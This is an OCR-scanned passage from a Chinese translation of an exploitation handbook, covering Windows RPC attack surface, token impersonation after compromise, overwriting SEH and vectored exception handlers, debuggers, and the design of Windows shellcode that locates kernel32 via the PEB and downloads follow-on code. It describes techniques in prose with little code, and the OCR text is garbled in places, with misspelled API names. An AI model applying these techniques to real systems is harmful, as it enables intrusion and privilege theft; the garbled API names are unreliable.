Muddle (www.cse.unsw.edu.au/~matthewc/muddle/〉 可 能 会 对 你 有 所 帮助 。 它 可 以 自动 解码 某 些 
可 执行 文件 ， 把 它们 的 参数 告诉 你 。 本 章 开 头 的 IDL 片 断 就 是 Muddle 生 成 的 ， 是 我 们 从 RPC 定 位 


器 服务 文件 里 获得 的 。 
微软 公司 几乎 对 其 可 以 控制 的 任何 东西 都 封装 了 DCE-RPC 协 议 。 从 SMB 到 SOAP， 如果 你 可 
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以 在 它 上 面 封装 DCE-RPC， 就 能 启用 所 有 的 微软 工具 。 在 这 个 例子 里 ， 你 可 以 看 到 命名 管道 接 
O (ncacn np) 上 的 DCE-RPC、Local RPC 接 口上 的 DCE-RPC 和 TCP 接 口上 的 DCE-RPC。 命 名 
管道 、TCP 和 UDP 接口 都 是 可 以 远程 访问 的 。 这 些 对 黑客 来 说 都 是 极 具 诱 惑 力 的 。 


6.3.2 破解 

破解 远程 的 DCOM 服 务 和 破解 远程 的 SunRPC 服 务 的 方法 差不多 。 黑客 可 以 进行 popen ( ) 或 
system() 类 型 的 攻击 ， 尝 试 访问 文件 系统 上 的 文件 ， 寻 找 缓冲 区 溢出 或 类 似 攻 击 ， 设 法 绕 过 认 
证 ， 或 者 用 想到 的 、 可 以 攻击 远程 服务 器 的 任何 方法 破解 应 用 程序 。 目 前 摆弄 RPC 服 务 的 最 好 工 
具 非 SPIKE 葛 属 。 然 而 ， 如 果 打 算 破 解 远 程 的 DCE-RPC 服 务 ， 还 有 许多 工作 要 做 ， 要 用 所 选择 的 
语言 重 写 这 个 协议 。CANVAS Cwww.immunitysec.com/CANVAS) 用 Python 重 写 了 DCBE-RPC。 

在 开始 的 时 候 ， 你 可 能 会 尝试 用 微软 的 内 部 API 破 解 DCE-RPC 或 DCOM， 但 从 长 远 来 看 ， 
这 样 做 无 法 直接 控制 API， 从 而 导致 破解 质量 低下 。 可 能 的 话 ， 一 定 要 自己 开发 或 使 用 开源 的 
协议 实现 。 
6.3.3 令 牌 及 其 冒 用 

令 牌 表示 访问 权限 。 在 Linux 下 , 访问 资源 (如 文件 或 进程 ) 的 权限 是 用 简单 的 user/group/any 
(用 户 / 组 /任何 ) 权限 集 定义 的 ， 但 Windows 与 Linux 完 全 不 一 样 , : 它 使 用 了 灵活 但 很 难 理解 的 、 
依赖 于 令 牌 的 机 制 。 简 单 说 ， 令 有 牌 就 是 一 个 32 位 的 整数 ， 与 文件 句柄 类 似 。NT 内 核 为 每 个 进程 
维护 一 个 内 部 结构 ， 用 令 牌 表示 进程 的 访问 权限 。 例如， 进程 在 派生 另外 的 进程 时 ， 必 须 检 查 它 
是 否 能 够 访问 它 想 派生 的 文件 。 

现在 ， 这 里 的 情况 变 得 有 些 复杂 了 ， 因 为 除了 令 牌 有 不 同 的 类 型 处 ， 两 个 令 牌 〈 主 令 牌 和 当 
前 的 线程 令 牌 ) 还 会 影响 彼此 间 的 操作 。 进 程 启 动 时 获得 主 令 牌 。 当 前 线程 的 令 牌 可 以 从 另外 的 
进程 或 通过 LogonUser () 函数 获取 。LogonUser () 函数 需要 用 户 名 和 密码 ， 如 果 调 用 成 功 ， 它 将 
返回 一 个 新 令 牌 。 你 可 以 用 SetThreadToken (token_to_attach) 把 特定 令 牌 交 给 当前 的 线程 ， 
然后 在 线程 归还 主 令 牌 的 地 方 用 RevertToSelf () 移 走 它 。 

顺便 说 一 下 , 用 Sysinternals (http://www.microsoft.com/technet/sysinternals/) 的 Process Explorer 
加 载 进程 ， 你 将 会 看 到 ， 主 令 牌 被 作为 ser Name 打 印 出 来 了 ， 在 底部 窗 体 还 可 以 看 到 一 个 或 多 
个 带 不 同 访问 级 别 的 令 牌 。 图 6-2 显 示 进 程 中 的 多 个 令 牌 。 

从 其 他 进程 中 获得 令 牌 很 简单 :如 果 你 调用 ImpersonateNamedPipeclient ()， 内 核 将 把 
附 上 你 创建 的 命名 管道 进程 的 令 牌 交 给 你 。 同 样 ， 你 也 可 以 模拟 远程 DCE-RPC 客 户 端 或 给 你 用 户 
名 和 密码 的 客户 端 。 l 

例如 ， 当 用 户 连接 UNIX 的 FTP 服 务 器 并 且 FTP 服 务 正在 以 root 权限 运行 时 ，EFTP 服 务 器 可 
以 用 setuid() 把 用 户 的 ID 改 成 认证 时 用 户 客户 端 声明 的 那个 。 对 Windows 来 说 , 用 户 发 送 用 户 名 
和 密码 后 ，FTP 服 务 器 调用 PogonUser () 返回 一 个 新 令 牌 ， 然 后 派生 一 个 新 线程 ， 新 线程 调用 
SetThreadToken (new_token) 。 当 线程 结束 对 客户 端的 服务 时 ， 它 调用 RevertTeSselLf () 加 入 线 
程 池 ， 或 者 调用 ExitThread() 退 出 。 















































94 #62 Windows 操作 系统 


& Process Explorer - Sysinternals: www sysinternals.com 
File View Process llandie Options Search Help 


@aaag* « 





图 6-2 {Process eo 注意 管理 员 令 牌 与 用 户 〈 主 令 牌 ) 之 间 访 问 级 别 的 异同 


对 黑客 来 说 ， 需 要 仔细 审视 整个 过 程 以 寻找 攻击 机 会 。 在 UNIX 里 ， 通 过 认证 并 且 用 缓冲 区 
溢出 破解 FTP 服 务 器 后 ， 攻 击 者 不 能 变 成 root 或 其 他 用 户 ?。 在 Windows 里 ， 在 刚刚 被 认证 的 用 户 
内 存 空间 里 很 可 能 会 发 现 需 要 的 令 牌 攻击 者 可 以 抽取 并 使 用 它 。 当 然 ， 在 许多 情形 下 ，FTP 服 
务 器 是 以 sYsTEM 运 行 的 ， 可 以 调用 RevertToSelf () 获得 它 的 特权 。 

人 们 对 createProcess () 有 一 个 常见 的 误区 。UNIX 黑 客 经 常 把 execve ("/bin/sh") 作 为 
shellcode 的 一 部 分 ， 但 在 Windows 下 ，cCreateProcess () 把 主 令 牌 当 作 新 进程 的 令 牌 ， 并 用 当前 
线程 的 令 牌 访问 所 有 的 文件 。 这 意味 着 如 果 当 前 主 令 牌 比 当 前 线程 令 牌 的 访问 权限 低 ， 新 进程 可 
能 无 法 读 取 或 删除 它 自己 的 可 执行 文件 。 

在 IIS 攻 击 期 间 发 生 的 事情 是 对 这 个 怪 现 象 的 最 好 佐证 。IIS 的 外 部 组 件 运 行 在 主 令 牌 是 IUSR 
或 IwaM 而 不 是 SYSTEM 的 进程 内 。 但 在 这 些 进程 中 ， 经 常 有 以 SYsTEM 运 行 的 线程 。 当 黑客 利用 洲 
出 获得 某 个 线程 的 控制 、 下 载 一 个 文件 并 用 它 调用 createProcess() 时 , 他 们 会 发 现 他 们 自己 作 
为 IUSR 或 TWAM 运 行 ， 但 这 个 文件 却 属于 syYsTEM。 

如 果 发 现 自己 正 处 在 这 种 情形 之 中 ， 你 有 两 个 选择 ; RipuplicateTokenEx (ERINES 
n, 把 它 分 配给 createProcessAsUser () 调用 ;直接 把 DLL 载 入 内 存 或 利用 shellcode〈 它 可 以 做 


QD 利用 其 他 途径 提升 权限 除外 。 一 一 译 者 注 
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任何 你 想 在 原始 进程 内 做 的 事情 )， 在 当前 线程 的 内 部 做 任何 事 。 


6.3.4 ”Win32 平 台 的 异常 处 理 

在 Linux 平 台 上 ， 蜡 常 处 理 程序 通常 是 全 局 的 ; 换 名 话说， 是 针对 每 个 进程 的 。 无 论 什 么 时 
候 出 现 异常 情况 ， 系 统 都 会 调用 你 用 signal () 系统 调用 设置 的 异常 处 理 程序 ， 例 如 发 生 segfault 
(Windows 系 统 内 的 术语 是 AV)。 在 Windows 平 台 上 ， 全 局 处 理 程序 〈 位 于 ntdl1.dl1 之 中 ) 捕获 
所 有 的 异常 ， 然 后 执行 相当 复杂 的 例 程 来 确定 最 终 把 控制 权 交 给 谁 。 因 为 Windows NT 下 的 编程 
模型 是 以 线程 为 重心 的 ， 所 以 ， 异 常 处 理 模型 也 是 以 线程 为 重心 的 。 

图 6-3 或 许 有 助 于 说 明 Windows NT 下 的 异常 处 理 。 
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6-3 OllyDbg 很 好 地 显示 了 Windows NT 下 的 异常 处 理工 作 


在 图 6-3 中 ， 我 们 看 到 cmad . exe 进 程 有 两 个 线程 。 第 二 个 线程 的 数据 块 〈 在 运行 时 ， 数 据 
块 位 于 fs: [0] ) 有 一 个 指针 指向 异常 结构 的 链表 。 这 个 结构 (Structured Exception Handler, 
SEH) 的 第 一 个 元 素 是 指向 下 一 个 处 理 程序 的 指针 。 这 个 结构 的 第 二 个 元 素 是 一 个 函数 指针 。 
如 图 6-3 显 示 的 那样 ， 当 指向 下 一 个 处 理 程序 的 指针 设 为 -1 时 ， 表 示 处 理 链 中 没有 更 多 的 处 理 
程序 。 如 果 第 一 个 处 理 程序 没有 处 理 这 个 异常 ， 下 一 个 处 理 程序 (有 的 话 ) 将 进行 处 理 ， 依 
此 类 推 。 如 果 到 最 后 都 没有 一 个 处 理 程序 处 理 它 ， 默 认 的 异常 处 理 程 序 将 处 理 它 ， 常 见 的 处 
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理 方式 是 终止 进程 。 

作为 一 个 黑客， 当 碰 到 通过 堆 溢 出 或 类 似 的 允许 向 内 存 写 入 一 个 字 的 攻击 时 ,应 该 马上 想到 
一 些 控制 这 个 系统 的 方法 。 不 错 ， 就 是 改写 指向 SEH 链 的 指针 。Win32 程 序 里 的 每 个 进程 都 有 一 
个 操作 系统 提供 的 SEH。 这 个 SEH 负 责 向 用 户 显示 应 用 程序 已 被 终止 的 错误 框 。 如 果 碰 巧 你 在 运 
行 调试 器 ，SEH 将 提示 你 是 否 要 调试 这 个 程序 。 男 一 种 可 能 是 改写 位 于 栈 上 的 处 理 程 序 的 函数 指 
针 ， 或 者 改写 默认 的 异常 处 理 程序 。 

在 Windows XP 上 ， 还 有 男 外 一 个 选择 Vectored Exception Handling (向 量化 异常 处 理 )。 从 
根本 上 说 ， 它 只 是 另 一 种 版 本 的 链表 ， 首 先 会 检查 ntdl11.dl1 里 的 异常 处 理 代 码 。 因 此 ， 你 现在 
有 一 个 不 管 触发 何 种 异常 都 能 得 到 调用 的 全 局 变量 ， 这 对 改写 来 说 ， 实 在 是 太 完美 了 。 


6.4 调试 Windows 


调试 Windows 程 序 至 少 有 3 种 选择 ; 微软 的 工具 链 WinDbg、 内 核 调试 器 SoftICE 或 者 OllyDbg。 
如 果 感 兴趣 也 可 以 用 Visual Studio。 

在 这 些 选 择 当中 ，SoftICE 或 许 是 最 早出 现 也 是 最 强大 的 。SoftICE 的 特点 是 支持 宏 语 言 ， 可 
以 调试 内 核 空 间 ， 缺 点 是 安装 起 来 异常 困难 ， 而 且 GUI 有 点 过 时 。 它 的 主要 用 处 是 调试 新 的 设备 
驱动 程序 。 在 很 长 一 段 时 间 内 , 它 曾 是 黑客 的 唯一 选择 , 因此 , 有 很 多 介绍 怎样 使 用 它 的 好 文章 。 
SoftICE 在 调试 内 核 的 时 候 , 把 所 有 页 设 为 可 写 , 因此 , 如 果 你 正在 破解 的 内 核 溢 出 只 有 在 SoftICE 
被 启用 时 才 工 作 ， 那 么 你 应 该 考虑 是 否 是 出 于 这 个 原因 了 。 

WinDbg 可 以 调试 内 核 ， 尽 管 它 需 要 一 条 串 行 线 和 另外 一 台 计 算 机 2， 但 它 也 能 很 好 地 调试 用 
户 空间 的 溢出 。WinDbg 使 用 原 语 ， 但 用 户 界面 比较 糟糕 ， 几 平 不 可 能 快速 正确 地 使 用 。 尽 管 如 
此 ， 但 因为 它 是 微软 使 用 的 调试 器 ， 所 以 拥有 一 些 非常 好 的 高 级 特性 ， 比 如 说 ， 自 动 访问 微软 的 
符号 服务 器 。WinDbg 的 命令 行 版 本 CDB 非 常 灵活 ， 对 那些 热衷 于 命令 行 的 人 来 说 可 能 是 更 好 的 
选择 。 

正如 SPIKE 是 目前 最 好 的 模糊 测试 工具 一 样 ，OllyDbg 可 能 是 迄今 为 止 最 好 的 调试 器 。 它 支 
持 一 些 令 人 惊异 的 特征 ， 例 如 运行 追踪 《允许 往 回执 行 ) 内 存 搜索 、 内 存 断 点 〈 例 如 ， 你 可 以 告 
诉 它 , 在 每 次 访问 MsvcRT.DLL 全 局 数据 空间 里 的 数据 时 设置 中 断 )、 智 能 的 数据 窗口 〈 例 如 图 6-3 
显示 的 线程 结构 )。 同 时 ， 它 也 是 一 个 强大 的 反 汇编 程序 和 文件 补丁 程序 ， 基 本 上 你 想 要 的 东西 
它 都 有 。 如 果 你 认为 OllyDbg 缺 少 某 些 必要 的 功能 ， 可 以 给 作者 发 电子 邮件 ， 境 运 的 话 ， 下 个 版 
本 可 能 就 会 加 上 。 花 时 间 用 OllyDbg 附 上 进程 ， 然 后 用 SPIKE 对 它们 进行 模糊 测试， 并 分 析 它 们 
的 异常 。 这 会 使 你 快速 熟悉 非常 友好 的 OllyDbg GUI. 


6.4.1 Win32 里 的 bug 


Win32 里 有 许多 bug， 其 中 大 部 分 从 未 对 外 公开 ， 是 写 shellcode 的 人 历经 艰辛 之 后 才 发 现 的 。 
例如 ， 如 果 LoadrLibraryA()〔 其 功能 是 把 DLL 载 入 内 存 ) 的 PATH 参 数 里 有 句点 ， 且 系统 没有 打 





CD 现在 利用 VMWare， 可 以 在 同一 台 机 器 上 调试 了 。 一 一 译 者 注 


6.4 调试 Windows 97 


HART, Loadnibrarya O 的 加 载 将 失败 ;如果 栈 没有 按 字 对 齐 ，WinSock 例 程 将 失败 。 很 
多 API 在 MSDN 里 找 不 到 相应 的 文档 ， 或 者 文档 讲解 得 很 简单 。 

当 你 的 shellcode 不 工作 时 ， 很 有 可 能 就 是 由 于 Windows 里 的 错误 ， 而 最 好 的 方法 就 是 绕 过 它 
们 《车 不 起 还 躲 不 起 吗 )。 
6.4.2 编写 Windows shellcode 

很 长 一 段 时 间 以 来 ， 编 写 可 靠 的 Windows shellcode 始 终 是 件 深 不 可 测 的 事 。 这 和 编写 UNIX 
shellcode 不 太一 样 ， 在 Windows 里 ， 并 没有 和 已 知 API 相 一 致 的 系统 调用 。 相 反 ， 进 程 可 以 把 指 
向 外 部 函数 的 函数 指针 (例如 createProcess () 或 ReadFile()) 载 入 内 存 。 但 是 黑客 并 不 能 预 
先知 道 它们 位 于 内 存 的 什么 地 方 。 早 期 的 shellcode 只 能 假设 它们 在 某 个 地 方 ， 或 者 猜测 它们 是 某 
些 地 方 中 的 一 个 。 但 这 意味 着 每 次 编写 破解 程序 时 , 必须 根据 不 同 的 SP 或 可 执行 文件 生成 不 同 版 
本 的 破解 程序 ， 也 就 是 说 ， 通 用 性 不 是 很 好 。 

编写 可 靠 的 、 可 重用 的 shellcode 的 秘 决 是 ，Windows 把 指向 进程 环境 块 的 指针 保存 在 已 知 的 
位 置 : Fs: [0x30]。 这 个 位 置 加 上 0xc 就 是 载 入 顺序 模块 列表 指针 。 现 在 有 了 模块 的 链表 ， 可 以 
通过 遍历 它 来 寻找 kernel132.d11。 而 kernel32.dal1 又 包含 了 LoadrLibrarya() 和 Getproc- 
Address ()， 有 了 它们 ， 就 可 以 加 载 任何 DLL， 并 找 出 需要 的 函数 地 址 了 。 你 应 该 重读 PE-COFF 
文档 以 理解 微软 的 shellcode， 然 后 再 做 这 一 步 。 

这 个 技术 好 是 好 ， 但 因为 它 比较 复杂 ， 从 而 导致 最 后 生成 的 shellcode 比 较 大 。 近 几 年 来 一 
些 技 术 不 断 改进 完善 ， 已 经 可 以 使 shellcode 变 得 更 小 了 ， 其 中 包括 了 创新 的 散 列 法 。NGS 公 司 
的 Dafydd Stuttard* 在 2005 年 发 表 的 论文 中 提供 了 一 个 191B 的 与 shell 绑 定 的 shellcode (其 中 没有 
空 字 节 )， 其 中 就 使 用 了 一 些 非常 巧妙 的 方法 来 使 代码 变 得 更 小 ， 包 括 使 用 请 求 的 函数 名 的 8 位 
散 列 值 。 

当然 ， 这 并 不 是 唯一 的 方法 。 比 如 说 ， 中 国 黑客 在 其 所 写 的 shellcode 里 ， 通 过 设置 异常 处 理 
程序 ， 在 内 存 里 搜寻 kerne132。 如 果 你 想 了 解 这 个 技术 的 细节 ， 可 以 查阅 NSFOCUS 为 JIS 所 写 的 
攻击 代码 。 

即使 采用 NSFOCUS 使 用 的 方法 ， 生 成 的 shellcode 可 能 还 会 偏 大 。 因 此 ，CANVAS 把 shellcode 
分 成 不 同 的 部 分 , 主要 部 分 是 用 CANVAS 的 附加 块 编码 器 (类 似 于 XOR 编 码 器 / 译 码 器 , 但 用 adq1 
代替 xor1) 生成 的 150B 的 shellcode， 它 利用 异常 处 理 在 内 存 里 搜寻 另 一 部 分 一 一 以 8B 标 记 开 始 
的 shellcode。 实 践 证 明 ， 这 段 shellcode 非 常 可 靠 ， 你 可 以 把 它 放 到 内 存 的 任何 地 方 ， 而 不 必 担 心 
受到 空间 的 限制 。 
6.4.3 Win32 API 黑客 指南 

VirtualProtect(), ， 设 置 内 存 页 的 访问 控制 权限 。 我 们 可 以 给 .text 区 段 加 上 +w 属 性 ， 从 


而 修改 .text 区 段 里 的 函数 。 
SetDefaultExceptionHandler， 对 于 给 定 的 SP 来 说 ， 反 汇编 它 可 以 发 现 全 局 异常 处 理 程 


(D Dafydd Stuttard 所 著 的 《黑客 攻防 技术 宝典 ，Web 实 战 篇 》 已 由 人 民 邮 电 出 版 社 出 版 。 一 一 编者 注 





















































98 $63 Windows 操作 系统 





序 的 位 置 。 

TlsSetValue() /TLsGetvalue()， 每 个 线程 都 可 以 用 Thread Local Storage (线程 本 地 存储 
pO 而 不 是 栈 和 堆 保 存 特 殊 的 线程 变量 。 有 了 时候 ， 你 的 shellcode 想 扎 取 的 有 价值 的 指针 可 能 就 藏 
在 这 里 。 . 
WSASocket ()， 调 用 WSASocket () 而 不 是 socket () 生成 可 以 直接 用 作 标 准 输入 或 标准 输出 
HERF. 如 果 用 派生 cmda.exe 的 shellcode, 可 以 用 这 个 方法 生成 较 小 的 shellcode。( 由 socket () 
生成 的 套 接 字句 柄 里 的 问题 是 出 在 so_oPENTYPE 属 性 。) * 


6.4.4 ”黑客 有 眼中 的 Windows 


1. Win9X/ME 

ü 没有 用 户 或 安全 基础 架构 的 概念 (大 部 分 已 经 过 时 )。 

2. WinNT 

口 漏洞 百出 的 RPC 函 数 库 使 我 们 可 以 轻松 控制 RPC 服 务 。Win2K 下 的 RPC 数据 结构 在 默认 情 
况 没 有 被 验证 ， 因 此 ， 几 乎 所 有 的 恶意 数据 都 可 以 使 它们 册 演 。 

a 不 支持 NTLMV2 和 其 他 认证 方式 ， 使 网 络 窃听 很 容易 。 

O IIS 4.0 全 部 以 系统 权限 运行 ， 骨 省 后 不 会 自动 重启 。 

3. Win2K 

O Win2K 的 基本 安装 已 包括 NTLMv2。 

口 RPC 函 数 库 里 的 错误 比 NT 4.0 少 了 很 多 (当然 ， 并 不 是 说 NT 4.0 的 错误 非常 多 )。 

a SP4 一 一 清除 了 异常 寄存 器 。 

a IIS 5.0 以 系统 权限 运行 ， 但 URL 处 理 程 序 通常 不 以 系统 权限 运行 (FrontPage、WebDav 和 
类 似 组件 除 外 )。 

4. Win XP 

a 增加 的 Vectored Exception Handling (向 量化 异常 处 理 ) 使 堆 洲 出 更 加 容易 。 

a SP1 一 清除 了 异常 寄存 器 。 

a IIS 5.1 一 把 URL 限 制 为 合理 的 大 小 。 

a SP2 引 入 了 防火 墙 ， 对 RPC 做 了 大 量 修改 ，3 引 入 了 DEP (Data Execution Prevention， 数 据 
执行 保护 )，SafeSEH 使 利用 异常 处 理 程序 变 得 更 加 困难 了 ， 除 此 之 外 ， 还 做 了 许多 其 他 
方面 的 安全 改进 。 

5. Windows 2003 服 务 器 

O 用 栈 canary 编 译 了 整个 QOS， 包 括 内 核 。 

a IS 的 部 分 功能 移 到 内 核 里 。 

a IIS 6.0 仍 是 用 C++ 编写 的 ， 只 不 过 现在 运行 在 有 着 完全 不 同 配置 的 管理 过 程 和 一 秘 管 理 进 
程 之 下 ， 这 些 进程 可 以 根据 特殊 的 URL 和 虚拟 主机 设置 服务 于 端口 80/443。 

口 可 以 与 进程 分 离 而 不 会 导致 进程 有 裔 省。 在 Win32 以 前 的 版 本 中 ， 如 果 用 调试 器 附 上 进程 ， 
分 离 时 肯定 会 终止 进程 。 这 在 有 些 时 候 有 用 处 ， 但 大 多 数 时 候 令 人 讨厌 。 














6. Windows Vista 

每 段 代 码 都 用 改良 后 的 、 最 好 版 本 的 /GS 栈 canary 进 行 编译 。 

Q ASLR (Address Space LayoutRandomization， 地 址 空间 布局 随机 化 ) 使 大 多 数 利用 变 得 稍 
微 困 难 一 些 ， 但 是 当 它 和 DEP 结 合 起 来 使 用 时 ， 将 会 使 利用 变 得 非常 困难 。 

口 防火 墙 现 在 也 能 过 滤 外 出 的 数据 包 了 。 


6.5 ”小结 


本 章 介绍 了 Linux/UNIX 和 Windows 破 解 之 间 的 基本 差别 ,同时 介绍 了 一 些 高 级 的 Windows 概 
念 ， 比 如 系统 调用 和 进程 内 存 ， 从 黑客 的 视角 来 看 ， 这 和 Linux/UNIX 上 的 明显 不 同 。 掌 握 了 这 些 
Windows 的 破解 知识 ， 才 能 继续 学 习 下 面 的 Windows 黑 客 技术 。 
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人 说 写 shellcode 很 容易 ， 凭 心 而 论 ， 通 常情 况 下 是 不 太 难 ， 但 在 Windows 上 还 是 有 一 

定 难 度 的 (Windows 平 台 上 的 东西 都 不 简单 ), 而 且 有 时 候 还 会 使 人 倍 感 挫折 。 在 开始 
学 习 本 章 之 前 , 我 们 先 回顾 一 些 shellcode 的 要 点 , 然后 研究 Windows shellcode 那 令 人 着 迷 的 特性 ， 
并 由 此 讨论 AT&T 与 ntel 句 法 的 区 别 、Win32 中 的 各 种 漏洞 如 何 影响 利用 方法 ， 并 探讨 高 级 
Windows shellcode 的 发 展 方向 。 


7.1 句法 和 过 滤器 


首先 ， 不 使 用 编码 器 / 译 码 器 就 能 工作 并 且 体 积 又 很 小 的 Windows shellcode 几 平 不 存在 。 
无 论 如 何 ， 如 果 要 编写 许多 破解 代码 ， 你 可 能 会 想到 在 破解 代码 中 采用 标准 的 编码 器 / 译 码 器 
API 来 避免 经 常 调整 shellcode。 例 如 Immunity CANVAS 就 使 用 了 “附加 的 ”编码 器 / 译 码 器 。 
也 就 是 说 , 它 把 shellcode 视 为 一 组 无 符号 长 整数 列表 , 把 列表 中 的 每 个 无 符号 长 整数 加 上 x (x 
可 以 通过 不 断 重 试 随机 数 来 找到 )。 经 过 这 样 的 处 理 后 , 会 得 到 一 组 新 的 没有 坏 字 符 的 无 符号 
长 整数 列表 。 虽 然 编 码 器 / 译 码 器 工作 得 很 好 ， 但 仍 有 人 乐意 使 用 XOR、 基 于 字符 的 或 基于 字 
的 方法 。 

重要 的 是 ， 应 该 牢记 译 码 器 只 是 把 x 扩 展 到 不 同 字符 范围 的 y=f(x) 函数 。 如 果 x 仅 仅 包 含 小 
写字 母 ， 那 么 可 以 把 f(x) 看 作 是 把 小 写字 母 转换 成 二 进 制 字符 并 跳 转 到 那里 的 函数 ; 当然 ， 也 可 
以 把 E(x) 看 作 是 把 小 字 字 母 转 换 成 大 字 字 母 并 跳 转 到 那里 的 函数 。 换 名 话说, 当 遇 到 设置 严密 的 
过 滤器 ?时 ， 不 要 急于 一 次 解决 所 有 的 问题 ， 尝 试 使 用 多 重 解码 ， 把 攻击 串 分 段 转换 为 二 进 制 等 
方法 ， 这 样 可 能 会 更 容易 些 。 

本 章 不 介绍 编码 器 / 译 码 器 ， 并 假设 你 知道 怎样 把 二 进 制 数据 复制 到 进程 空间 并 跳 到 它 。 只 
要 你 会 写 Linux shellcode， 就 应 该 能 编写 x86 汇 编 代 码 。 我 写 Windows shellcode 和 写 Linux shellcode 
的 方式 一 样 ， 使 用 相同 的 工具 。 从 长 远 来 看 ， 熟 练 掌握 一 种 工具 会 使 编写 shellcode 变 得 更 轻松 。 
依 我 之 见 ， 不 必 花 大 把 的 钞票 购买 Visual Studio， 免 费 的 Cygwin (www.cygwin.com/) 就 是 很 好 的 
shellcode 编 写 工 具 。 安 装 Cygwin 可 能 有 点 慢 ， 所 以 安装 时 一 定 要 确保 打开 了 开发 工具 (gcc、as 
或 其 他 ), 来 确认 安装 是 否 完 成 。 有 些 人 喜欢 用 NASM 或 其 他 的 工具 写 shellcode, 但 这 些 工 具 在 编 


(D 现在 有 很 多 程序 在 接受 用 户 输入 时 ， 会 过 滤 一 些 可 能 有 歧义 的 字符 。 一 一 译 者 注 
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辑 代码 及 测试 编译 代码 时 略 有 不 便 。 


x86 AT&T 与 Intel 句法 的 对 比 





AT&T 与 Intel 句 法 有 两 个 主要 的 不 同 点 。 第 一 个 是 AT&T 多 法 使 用 助 记 符 source 和 dest， 
而 Intel 使 用 助 记 符 dest 和 source。 当 人 们 用 GUN 编 译 器 ( AT&T 使 用 ) 、 OllyDbg ( Intel 使 用 ) 
或 其 他 的 Windows 工 具 查 看 汇编 代码 时 ,这 种 互相 颠倒 的 形式 可 能 会 使 人 摸 不 着 头脑 . 当然 ， 


X86 的 寻 址 有 如 下 的 形式 : 两 个 寄存 器 ， 一 个 位 移 量 ， 一 个 比例 因子 ， 如 1、2、4 或 8。 所 
VA, mov eax, [ecx+ebx*4+5000] (OllyDbg 中 的 Intel 句法 ) 等 同 于 mov 5000 (%ecx, $ebx, 
4), $eax (GUN 编译 器 中 的 AT&T 名 法 ) . 

我 建议 大 家 学 习 AT&T 名 法， 理由 是 它 的 句法 清晰 。 考虑 一 下 mov eax, [ecx+ebx] "HUM 
是 基 址 寄存 器 ? 哪个 是 变 址 寄存 器 ? 特别 是 在 缺少 特征 时 , 更 容易 引起 混淆 。 出 现 这 种 情形 的 
主要 原因 还 是 寻 址 的 问题 : 两 个 寄存 器 似乎 是 一 样 的 ， 可 以 互 换 ; 但 实际 上 如 果 互 换 ， 生 成 的 
两 条 汇编 指令 将 完全 不 同 。 


7.2 创建 


编写 Windows shellcode 时 通常 会 碰 到 一 个 大 问题 : Win32 不 提供 直接 的 系统 调用 。 令 人 惊讶 
的 是 , 这 是 由 许多 人 讨论 后 决定 的 。 正如 Windows 的 一 贯 风格 那样 , 这 个 特性 有 令 人 讨厌 的 一 面 ， 
也 有 值得 称赞 地 方 。 值 得 称赞 的 是 ， 它 使 Win32 系 统 设计 者 在 修复 漏洞 或 扩展 内 部 系统 调用 API 
时 ， 不 会 影响 任何 使 用 Win32 高 级 API 的 应 用 程序 。 

为 了 使 shellcode 能 在 其 他 程序 之 中 运行 ， 我 们 还 需要 对 其 做 适当 修整 ， 如 下 所 示 。 

a 它 必须 找到 所 需要 的 Win32 API 函 数 ， 并 生成 调用 表 。 
为 了 建立 连接 ， 它 必须 能 加 载 所 需要 的 函数 库 。 
它 必须 可 以 连接 远程 服务 器 ， 下 载 并 执行 后 续 的 shellcode。 
它 必须 确保 自己 可 以 正常 退出 ， 并 使 原来 的 进程 继续 运行 或 终止 。 

口 它 必须 能 阻止 其 他 线程 对 它 的 终止 。 

a 如 果 它 想 让 后 续 的 Win32 调 用 继续 使 用 堆 ， 它 还 必须 修复 一 个 或 多 个 堆 。 

找到 需要 的 Win32 API 函 数 ， 过 去 是 指 在 shellcode 中 硬 编 码 这 些 函 数 的 地 址 ， 或 者 是 硬 编码 
Windows 某 个 版 本 的 GetProcadqressa() 和 LoadLibraryA () 地址 。 现 在 硬 编码 函数 地 址 仍然 是 
编写 Windows shellcode 最 快速 的 方法 之 一 ， 但 只 适合 特殊 的 可 执行 文件 或 某 些 版 本 的 Windows。 
但 是 正如 SQL Slammer 蠕 虫 所 展示 的 那样 ， 硬 编码 函数 地 址 有 些 时 候 非常 有 用 。 





Oo oO 


注解 Slammer 源 代码 在 互联 网 上 广 为 流 传 ， 它 是 非常 好 的 学 习 硬 编码 函数 地 址 的 例子 。 























为 了 避免 依赖 任何 可 执行 程序 或 OS 的 特殊 状态 ， 我 们 最 好 使 用 其 他 的 方法 。 一 种 方法 模拟 
正常 的 DLL 链接 进入 进程 的 方法 ， 然 后 找 出 函数 的 位 置 。 另 一 种 方法 是 搜索 kerne132 .dl11 函 数 
使 用 的 内 存 空 间 ， 通 过 寻找 kerne132 .dl11 所 对 应 的 PEB (Process Environment Block, 进程 环境 
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块 ) 中 国 的 黑客 经 常用 这 个 方法 ) 找 出 函数 的 位 置 。 本 章 稍 后 还 将 介绍 怎样 利用 Windows 异 党 
处 理 系统 搜索 整个 内 存 空 间 。 


7.2.1 #47 PEB 
下 面 的 例子 源 自 CANVAS 中 的 Windows shellcode， 在 分 析 这 些 代码 之 前 ， 先 介绍 一 下 开发 
shellcode 时 的 想法 。 
0 可 靠 性 是 关键 。 它 必须 在 没有 外 部 支援 的 情况 下 正常 工作 。 
D 扩展 性 很 重要 。 当 你 在 某 些 无 法 预料 的 情况 下 想 定 制 shellcode 时 ， 就 能 体会 到 扩展 性 的 重 
要 了 。 
O 长 度 也 很 重要 ， 当 然 是 越 小 越 好 。 但 压缩 长 度 需 要 花 时 间 ， 也 可 能 使 shellcode 显 得 杂乱 且 
难以 管理 。 由 于 这 些 原因 ， 这 个 例子 中 的 shellcode 显 得 有 些 有 肿 ， 但 接 下 来 我 们 将 利用 结 
构 异 常 处 理 程 序 (Structured Exception Handler, SEH) 捕获 shellcode 来 克服 这 个 问题 。 如 
果 你 想 学 习 x86 汇 编 语 言 并 且 打 算 把 这 段 shellcode 再 压缩 一 下 ， 只 能 自学 了 。 
注意 ， 这 段 C 源 码 比 较 简单 ， 可 以 在 gcc 支持 的 x86 平 台 上 进行 编写 并 编译 。 现 在 ， 我 们 逐 行 
分 析 heapoverflow.c， 看 它 是 如 何 运 行 的 。 


7.2.2 分 析 Heapoverflow.c 
如 果 是 写 Win32 程 序 , 首先 要 包含 windows.h, 我 们 可 以 从 这 个 头 文件 中 获得 一 些 Win32 常 量 


//released under the GNU PUBLIC LICENSE v2.0 
#include <stdio.h> 

#include <malloc.h> 

#ifdef win32 

#include «windows.h» 

#tendif 


